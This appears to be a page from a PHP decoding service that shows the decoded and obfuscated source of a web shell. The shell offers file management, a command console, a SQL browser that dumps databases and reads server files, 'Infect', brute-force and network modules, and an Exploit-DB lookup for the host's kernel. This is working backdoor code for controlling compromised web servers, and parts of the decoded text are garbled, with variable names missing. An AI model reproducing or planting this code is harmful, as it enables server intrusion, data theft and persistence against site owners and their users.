	.main tr:hover{background-color:#354252;}
	.main td, th{vertical-align:middle;}\xa\x9input[type='submit']{background-color:#0d52bf; color:#fafafa;}\xa	input[type='button']{background-color:#0d52bf; color:#fafafa;}
	input[type='submit']:hover{background-color:#002e99; color:#fafafa;}
	input[type='button']:hover{background-color:#002e99; color:#fafafa;}\xa	.l1	\x9	{background-color:#202832;}\xa\x9pre	\x9\x9{font:9pt Courier New;}\xa</style>\xa<script>\xa    var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';
    var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'
    var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';
    var p1_ = '" . (strpos(@$_POST["p1"], "\xa") !== false ? '' : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';\xa    var p2_ = '" . (strpos(@$_POST["p2"], "\xa") !== false ? '' : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';\xa    var p3_ = '" . (strpos(@$_POST["p3"], "\xa") !== false ? '' : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';\xa    var d = document;
\x9function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
\x9function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\xa\x9function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}\xa	function set(a,c,p1,p2,p3,charset) {
	\x9if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\xa		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\xa\x9	if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
\x9\x9if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
\x9\x9if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\xa\x9	d.mf.a.value = encrypt(d.mf.a.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');\xa\x9\x9d.mf.c.value = encrypt(d.mf.c.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');\xa\x9\x9d.mf.p1.value = encrypt(d.mf.p1.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');
	\x9d.mf.p2.value = encrypt(d.mf.p2.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');
\x9\x9d.mf.p3.value = encrypt(d.mf.p3.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');\xa	\x9if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\xa	}\xa	function g(a,c,p1,p2,p3,charset) {\xa\x9	set(a,c,p1,p2,p3,charset);\xa		d.mf.submit();\xa	}
\x9function a(a,c,p1,p2,p3,charset) {
\x9	set(a,c,p1,p2,p3,charset);\xa		var params = 'ajax=true';\xa	\x9for(i=0;i<d.mf.elements.length;i++)\xa			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\xa\x9	sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);\xa\x9}\xa\x9function sr(url, params) {\xa		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();\xa	\x9else if (window.ActiveXObject)
\x9		req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {\xa            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\xa            req.send(params);\xa        }\xa	}\xa	function processReqChange() {\xa\x9	if( (req.readyState == 4) )
	\x9\x9if(req.status == 200) {\xa		\x9	var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
\x9\x9	\x9var arr=reg.exec(req.responseText);\xa\x9\x9	\x9eval(arr[2].substr(0, arr[1]));
\x9\x9	} else alert('Request error!');
	}
</script>
<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>\xa<input type=hidden name=a>\xa<input type=hidden name=c>\xa<input type=hidden name=p1>\xa<input type=hidden name=p2>\xa<input type=hidden name=p3>\xa<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS["cwd"]); $totalSpace = @disk_total_space($GLOBALS["cwd"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("r"); $kernel = @php_uname("s"); $explink = "http://nullrefer.com/?https://www.exploit-db.com/search/?action=search&description="; if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ''; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); $opt_charsets = ''; foreach ($charsets as $) { $opt_charsets .= "<option value="" . $ . "" " . ($_POST["charset"] == $ ? "selected" : '') . ">" . $ . "</option>"; } $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Infect" => "Infect", "Sql" => "Sql", "Php" => "Php", "Safe mode" => "SafeMode", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); if (!empty($GLOBALS["\xe2\226\x9b"])) { $m["Logout"] = "Logout"; } $m["Self remove"] = "SelfRemove"; $menu = ''; foreach ($m as $k => $v) { $menu .= "<th>[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } $drives = ''; if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " <a href="https://nullrefer.com/?https://www.google.com/search?q=" . urlencode(@php_uname()) . "" target="_blank">[ Google ]</a> <a href="" . $explink . "" target=_blank>[ Exploit-DB ]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=#a10705>ON</font>" : "<font color=#f9c440><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . viewSize($totalSpace) . " <span>Free:</span> " . viewSize($freeSpace) . " (" . round(100 / ($totalSpace / $freeSpace), 2) . "%)<br>" . $cwd_links . " " . viewPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">" . $opt_charsets . "</select></label><br><span>Server IP:</span><br>" . gethostbyname($_SERVER["HTTP_HOST"]) . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="background-color:#0d52bf;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div>"; } goto OWR26; rGxXC: function actionSql() { class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysql_query($str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysql_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysql_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_charset")) { return @mysql_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '" . addslashes($str) . "';select file from hard2;"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query("drop table hard2"); return array("file" => implode("\xa", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); $create = mysql_fetch_array($res); $sql = $create[1] . ";
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("SELECT * FROM `" . $table . "`"); $i = 0; $head = true; while ($ = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($ as $k => $v) { if ($v === null) { $[$k] = "NULL"; } elseif (is_int($v)) { $[$k] = $v; } else { $[$k] = "'" . @mysql_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \xa	(" . implode(", ", $) . ")"; $head = false; } else { $sql .= "\xa\x9,(" . implode(", ", $) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, ";

"); } else { echo ";

"; } } break; case "pgsql": $this->query("SELECT * FROM " . $table); while ($ = $this->fetch()) { $columns = array(); foreach ($ as $k => $v) { $[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["type"]); if (@$_POST["p2"] == "download" && @$_POST["p1"] != "select") { $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); $db->selectdb($_POST["sql_base"]); switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } if (empty($_POST["file"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach ($_POST["tbl"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["file"], "w")) { foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["p2"]); } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } } hardHeader(); echo "
<h1>Sql browser</h1><div class=content>\xa<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\xa<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xa<td><label><select name='type'><option value='mysql' "; if (@$_POST["type"] == "mysql") { echo "selected"; } echo ">MySql</option><option value='pgsql' "; if (@$_POST["type"] == "pgsql") { echo "selected"; } echo ">PostgreSql</option></select></label></td>\xa<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>\xa<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . ""></td>\xa<td><input type=text name=sql_pass value="" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "" required></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } $db->listDbs(); echo "<label><select name=sql_base><option value=''></option>"; while ($ = $db->fetch()) { list($key, $value) = each($); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } echo "</select></label>"; } else { echo $tmp; } } else { echo $tmp; } echo "</td>
		\x9\x9<td><input type=submit value='submit' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>\xa\x9	\x9</tr>\xa		</table>\xa	\x9<script>\xa            s_db='" . @addslashes($_POST["sql_base"]) . "';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xa                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
\x9	\x9function st(t,l) {
\x9			d.sf.p1.value = 'select';
	\x9	\x9d.sf.p2.value = t;\xa                if(l && d.sf.p3) d.sf.p3.value = l;
	\x9		d.sf.submit();\xa\x9\x9\x9}
\x9	\x9function is() {\xa\x9\x9	\x9for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xa	\x9	\x9	d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xa\x9\x9\x9}\xa		</script>"; if (isset($db) && $db->link) { echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while ($ = $db->fetch($tbls_res)) { list($key, $value) = each($); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small>({$n["n"]})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if (@$_POST["p1"] == "select") { $_POST["p1"] = "query"; $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; echo " of {$pages}"; if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>&lt; Prev</a>"; } if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next &gt;</a>"; } $_POST["p3"]--; if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } echo "<br><br>"; } if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { $title = false; echo "<table width=100% cellspacing=1 cellpadding=2 class=main>"; $line = 1; while ($ = $db->fetch()) { if (!$title) { echo "<tr>"; foreach ($ as $key => $value) { echo "<th>" . $key . "</th>"; } reset($); $title = true; echo "</tr><tr>"; $line = 2; } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($ as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } echo "</table>"; } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='submit'></form>"; } } if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } } else { echo htmlspecialchars($db->error()); } echo "</div>"; hardFooter(); } goto et3or; hwJg4: @ini_set("log_errors", 0); goto gkT1m; WJp40: $home_cwd = @getcwd(); goto YIyjV; G6Uv3: ?>

Did this file decode correctly?

Original Code

 goto r3B2Y; Oda8Q: function actionConsole() { if (!empty($_POST["\x70\61"]) && !empty($_POST["\160\x32"])) { prototype(md5($_SERVER["\110\124\124\120\x5f\110\117\x53\124"]) . "\x73\164\144\145\x72\162\x5f\x74\x6f\137\157\x75\164", true); $_POST["\x70\x31"] .= "\x20\62\76\x26\61"; } elseif (!empty($_POST["\x70\x31"])) { prototype(md5($_SERVER["\110\x54\124\120\x5f\110\117\123\124"]) . "\163\164\x64\x65\162\162\137\x74\157\x5f\157\165\164", 0); } if (isset($_POST["\141\x6a\x61\x78"])) { prototype(md5($_SERVER["\x48\x54\x54\x50\x5f\x48\117\123\x54"]) . "\x61\x6a\141\170", true); ob_start(); echo "\144\x2e\x63\146\x2e\x63\x6d\x64\56\166\141\x6c\x75\145\75\x27\x27\x3b\12"; $temp = @iconv($_POST["\x63\150\x61\162\x73\145\164"], "\x55\x54\106\x2d\x38", addcslashes("\12\44\x20" . $_POST["\160\61"] . "\12" . ex($_POST["\x70\x31"]), "\12\xd\x9\134\47\0")); if (preg_match("\41\x2e\52\143\x64\134\x73\x2b\50\x5b\x5e\x3b\135\x2b\x29\44\x21", $_POST["\160\61"], $match)) { if (@chdir($match[1])) { $GLOBALS["\143\x77\144"] = @getcwd(); echo "\143\x5f\75\x27" . $GLOBALS["\143\x77\x64"] . "\47\x3b"; } } echo "\x64\x2e\x63\x66\x2e\157\165\x74\x70\165\x74\56\166\141\154\x75\x65\53\x3d\47" . $temp . "\47\73"; echo "\144\x2e\143\146\x2e\157\x75\x74\160\165\164\x2e\163\143\162\x6f\x6c\x6c\124\157\160\x20\x3d\x20\144\56\143\146\56\157\x75\164\x70\x75\164\x2e\x73\143\162\x6f\154\154\x48\x65\x69\x67\x68\x74\73"; $temp = ob_get_clean(); echo strlen($temp), "\12", $temp; die; } if (empty($_POST["\141\152\x61\x78"]) && !empty($_POST["\160\61"])) { prototype(md5($_SERVER["\110\124\x54\120\137\110\117\x53\x54"]) . "\x61\x6a\141\x78", 0); } hardHeader(); echo "\74\x73\x63\x72\151\160\164\76\12\x69\x66\x28\x77\x69\156\144\157\167\56\x45\x76\x65\156\x74\51\x20\167\151\156\144\157\x77\x2e\x63\x61\x70\164\165\x72\x65\x45\166\145\156\x74\163\x28\105\x76\145\x6e\x74\x2e\x4b\105\x59\104\x4f\127\116\x29\x3b\xa\x76\x61\x72\40\143\x6d\x64\163\x20\75\40\x6e\145\x77\x20\101\162\162\141\171\x28\47\x27\51\73\12\x76\141\162\x20\143\165\x72\40\x3d\40\60\x3b\12\x66\165\x6e\143\164\x69\157\156\x20\153\x70\x28\145\51\40\x7b\12\x9\x76\141\162\x20\x6e\x20\x3d\x20\50\x77\x69\156\144\157\167\56\105\x76\x65\x6e\164\x29\40\77\40\x65\x2e\167\150\151\x63\150\x20\x3a\40\145\x2e\153\145\x79\103\157\144\x65\x3b\12\x9\x69\146\50\156\x20\75\75\x20\x33\70\x29\x20\173\12\11\x9\143\x75\x72\x2d\x2d\x3b\xa\11\x9\x69\x66\x28\x63\165\162\x3e\75\60\x29\12\x9\x9\11\144\157\143\165\x6d\145\x6e\164\x2e\143\x66\56\143\x6d\x64\x2e\x76\141\154\165\x65\40\x3d\40\143\x6d\144\x73\x5b\x63\x75\x72\135\x3b\xa\11\x9\145\x6c\163\145\xa\x9\x9\x9\x63\x75\162\x2b\x2b\x3b\xa\11\175\40\145\x6c\163\x65\40\151\146\50\x6e\x20\75\75\x20\x34\x30\x29\40\173\xa\11\x9\143\165\x72\x2b\53\x3b\xa\x9\11\151\146\x28\143\165\x72\x20\74\x20\x63\155\x64\163\56\154\x65\x6e\147\164\150\x29\xa\x9\11\11\144\157\143\165\155\145\156\164\x2e\x63\x66\56\x63\x6d\x64\56\x76\x61\154\x75\145\40\x3d\40\x63\155\x64\163\x5b\143\x75\162\135\73\12\x9\x9\x65\154\x73\145\12\11\x9\x9\x63\x75\162\55\x2d\x3b\12\x9\x7d\12\175\12\x66\165\156\143\x74\x69\157\156\x20\141\x64\144\x28\143\x6d\x64\x29\x20\x7b\xa\x9\x63\155\x64\x73\56\160\157\160\50\x29\x3b\xa\11\x63\155\144\163\x2e\160\165\163\x68\x28\143\155\144\51\x3b\12\x9\x63\x6d\144\163\56\160\x75\163\150\50\47\x27\51\x3b\xa\x9\143\x75\162\40\75\x20\143\155\x64\x73\56\x6c\x65\156\x67\x74\150\55\61\x3b\xa\175\12\x3c\x2f\x73\x63\x72\151\x70\164\76"; echo "\74\x68\x31\76\x43\157\x6e\163\157\154\145\74\x2f\x68\61\76\x3c\x64\151\x76\x20\x63\x6c\x61\x73\x73\75\x63\x6f\x6e\164\145\156\164\x3e\74\x66\x6f\162\155\x20\156\x61\155\145\75\143\146\40\x6f\156\163\165\x62\x6d\151\x74\x3d\x22\151\x66\x28\x64\x2e\143\x66\x2e\143\x6d\x64\x2e\x76\141\154\165\145\75\75\x27\x63\154\145\141\162\x27\x29\173\144\x2e\x63\x66\56\x6f\165\164\x70\165\x74\56\166\x61\154\165\145\x3d\47\47\73\x64\x2e\x63\x66\x2e\143\x6d\x64\x2e\x76\x61\154\165\145\75\47\47\x3b\x72\145\164\165\x72\x6e\40\x66\x61\x6c\x73\145\73\175\x61\x64\x64\x28\164\x68\151\163\56\x63\155\144\56\x76\x61\x6c\165\x65\x29\73\x69\146\x28\164\150\151\x73\56\141\152\x61\170\56\143\150\x65\x63\153\x65\144\51\x7b\141\50\156\x75\x6c\154\x2c\156\x75\x6c\154\x2c\x74\x68\151\163\x2e\x63\155\144\x2e\166\x61\154\x75\145\54\164\x68\x69\163\56\163\x68\x6f\167\137\x65\x72\x72\x6f\x72\163\56\x63\150\145\x63\x6b\145\x64\77\61\x3a\x27\x27\x29\73\175\x65\x6c\x73\145\x7b\147\50\156\x75\x6c\x6c\x2c\x6e\x75\x6c\154\x2c\x74\x68\x69\x73\x2e\143\x6d\144\56\x76\x61\x6c\165\x65\54\x74\x68\151\163\56\x73\150\157\167\137\x65\x72\162\157\162\163\x2e\x63\x68\x65\x63\153\145\x64\x3f\x31\72\x27\47\x29\73\x7d\x20\x72\x65\x74\x75\162\x6e\40\x66\141\x6c\x73\145\x3b\42\x3e\x3c\154\x61\x62\145\154\x3e\74\163\x65\x6c\145\x63\x74\40\156\141\155\145\x3d\141\x6c\x69\x61\x73\x3e"; foreach ($GLOBALS["\x61\x6c\x69\x61\163\x65\x73"] as $n => $v) { if ($v == '') { echo "\74\x6f\160\x74\x67\x72\157\x75\160\40\x6c\141\x62\145\x6c\x3d\x22\x2d" . htmlspecialchars($n) . "\x2d\42\x3e\74\57\x6f\160\x74\x67\162\157\x75\x70\x3e"; continue; } echo "\74\157\x70\x74\151\x6f\156\40\x76\x61\154\x75\145\x3d\42" . htmlspecialchars($v) . "\42\76" . $n . "\x3c\x2f\157\x70\x74\151\x6f\x6e\76"; } echo "\x3c\x2f\163\x65\x6c\145\x63\164\x3e\74\57\x6c\x61\142\145\154\76\x3c\x69\x6e\x70\165\x74\x20\x74\171\x70\x65\x3d\142\165\164\x74\157\x6e\x20\157\x6e\143\154\x69\x63\153\75\42\141\144\144\x28\144\x2e\x63\146\x2e\141\154\151\141\163\x2e\166\141\x6c\165\145\x29\x3b\x69\x66\x28\x64\x2e\x63\x66\x2e\141\x6a\x61\x78\x2e\x63\x68\x65\143\x6b\x65\x64\x29\173\141\x28\156\165\154\x6c\54\156\165\154\x6c\54\144\56\143\x66\x2e\141\154\151\141\x73\x2e\x76\141\154\165\145\x2c\144\x2e\143\146\56\163\150\157\x77\137\145\162\x72\x6f\x72\163\56\143\150\x65\143\x6b\145\144\x3f\61\x3a\x27\x27\51\x3b\x7d\145\x6c\x73\x65\x7b\x67\x28\156\x75\154\154\x2c\156\x75\x6c\x6c\54\144\56\x63\146\x2e\141\154\x69\x61\x73\x2e\x76\141\154\x75\145\54\x64\x2e\x63\146\56\x73\150\x6f\x77\x5f\x65\x72\162\x6f\162\163\56\143\150\145\x63\x6b\145\144\x3f\61\x3a\x27\x27\51\73\x7d\x22\40\166\x61\154\x75\x65\x3d\x22\x73\x75\x62\155\x69\164\42\x3e\40\74\x6e\x6f\x62\162\x3e\x3c\x69\156\160\165\164\x20\164\x79\160\145\x3d\x63\x68\145\x63\x6b\x62\x6f\170\40\156\141\155\x65\75\141\152\x61\170\x20\166\141\154\165\145\75\x31\40" . (@$_COOKIE[md5($_SERVER["\x48\124\x54\x50\x5f\x48\x4f\123\x54"]) . "\141\152\x61\x78"] ? "\143\x68\145\x63\153\145\x64" : '') . "\76\x20\163\x65\x6e\x64\x20\165\x73\x69\x6e\147\x20\x41\112\101\x58\x20\x3c\151\x6e\x70\x75\164\x20\164\171\160\x65\75\143\x68\145\143\x6b\142\x6f\x78\40\x6e\x61\155\145\x3d\163\x68\157\167\x5f\x65\162\x72\157\x72\x73\x20\166\x61\154\x75\x65\x3d\61\40" . (!empty($_POST["\x70\62"]) || $_COOKIE[md5($_SERVER["\x48\124\124\120\137\x48\117\x53\124"]) . "\163\164\144\x65\162\x72\137\164\157\137\157\165\x74"] ? "\x63\150\145\x63\153\x65\144" : '') . 